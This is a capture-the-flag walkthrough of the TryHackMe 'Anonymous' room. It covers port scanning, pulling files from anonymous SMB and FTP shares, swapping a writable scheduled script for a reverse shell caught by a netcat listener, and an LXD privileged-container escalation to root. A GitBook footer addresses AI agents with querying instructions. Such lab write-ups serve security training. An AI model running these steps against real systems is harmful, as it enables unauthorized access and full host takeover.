> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/anonymous.md).

# Anonymous

**Room Link:** <https://tryhackme.com/room/anonymous>

### Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="/files/wzVGKmcmSXWaeAHV3BC9" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/6iSVk2icwKj4SvC4ICW9" alt=""><figcaption></figcaption></figure>

### Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="/files/yDeiMMcCcExuVpbHgOIr" alt=""><figcaption></figcaption></figure>

### **TCP/445  - SMB**

**Kali**

```
smbclient -L //$VICTIM/
```

<figure><img src="/files/Eh7W2EM4VbRMBNDAWIbq" alt=""><figcaption></figcaption></figure>

There were just two dog pics, probably not interesting.

**Kali**

```
mkdir loot
cd loot
smbclient \\\\$VICTIM\\pics
prompt
mget *
```

### TCP/21 - **FTP**

Login using anonymous and no pass

**Kali**

```
ftp $VICTIM 21
binary
passive
cd scripts
mget *
```

## Initial Shell

There were these 3 files

<figure><img src="/files/7ayWPH2DQmZg7ClSFHQC" alt=""><figcaption></figcaption></figure>

I modified clean.sh to have a reverse shell back to my kali

<figure><img src="/files/crCk2x8pvxSLPCUefunX" alt=""><figcaption></figcaption></figure>

**Kali #1**

```
nc -lvnp 1337
```

**Kali #2**

```
ftp $VICTIM 21
binary
passive
cd scripts
put clean.sh
```

After a few minutes the script was ran and I had a shell.

<figure><img src="/files/ZlKflWPgd0vRdHBPE3k7" alt=""><figcaption></figcaption></figure>

Get autocomplete

<pre><code><strong>python -c 'import pty; pty.spawn("/bin/bash")'
</strong>ctrl + Z
stty raw -echo;fg
</code></pre>

## Privilege Escalation&#x20;

Followed this link on lxd privilege escalation&#x20;

**Link:** <https://www.hackingarticles.in/lxd-privilege-escalation/>

**Victim**

```
id
```

<figure><img src="/files/Wn2xMEjVYChHQ0TVo8iG" alt=""><figcaption></figcaption></figure>

**Kali**

```
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
```

**Note:** The command lxd init was to resolve a storage pool area issue, it may not always be needed.

**Victim**

```
cd /tmp
wget http://$KALI/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/anonymous.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.